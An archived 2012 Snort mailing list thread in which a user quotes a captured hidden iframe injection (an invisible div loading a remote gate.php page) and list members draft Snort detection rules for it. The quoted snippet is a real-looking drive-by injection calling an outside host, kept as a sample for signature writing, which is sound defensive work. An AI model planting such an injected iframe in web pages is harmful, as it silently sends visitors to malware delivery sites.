Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Rule thought

From: James Lay <jlay () slave-tothe-box net>
Date: Mon, 06 Aug 2012 13:29:25 -0600
On 2012-08-06 12:27, lists () packetmail net wrote:

On 08/06/12 13:13, James Lay wrote:

All,

Recently (today) I ran into the below:


<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div
class=pofasdfhg><iframe src=http://analitics3.in/gate.php?f=1003673
frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 
height=5
border=0></iframe></div><!--/qpi-->

I've not seen an iframe injection that included a specified class
before.  My original draft rule looked like:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
(msg:"INDICATOR-COMPROMISE div class iframe in page"; file_data;
pcre:"/<\/style><div class=[a-z]{9}><iframe src/i";
classtype:web-application-attack; sid:10000017; rev:1;)

But this looks pretty expensive.  I'm sure there's a better way to
match this...would it be something like:

content:"</style><div"; pcre:"/class=[a-z]{9}>/"; content:"<iframe
src";

My question is how do I tell Snort to match all three consecutively? 
I
get that I could use within, but would that apply to the pcre?  
Thanks
for any advice.


I think there's more of an abnormality around the unquoted URL in the
iframe and
I'm not certain the class will always be 9 characters, but assuming
it is how about:

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
(msg:"INDICATOR-COMPROMISE
div tag with class preceding iframe to specific URL"; 
flow:from_server,
established; file_data; content:"<div class="; content:"<iframe 
src=http:";
fast_pattern; within:30; pcre:"/<div class=[a-z]{9}><iframe
src=http[^\x3e]+\.php\?[a-z]=\d+\x20/"; classtype:bad-unknown; sid:x; 
rev:1;)

Just a thought...  Joel will probably want to add /smi ;)



Ah...I totally missed that...go me!  Thank you...this does help.

James

------------------------------------------------------------------------------
Live Security Virtual Conference
Exclusive live event will cover all the ways today's security and 
threat landscape has changed and how IT managers can respond. Discussions 
will include endpoint security, mobile security and the latest in malware 
threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: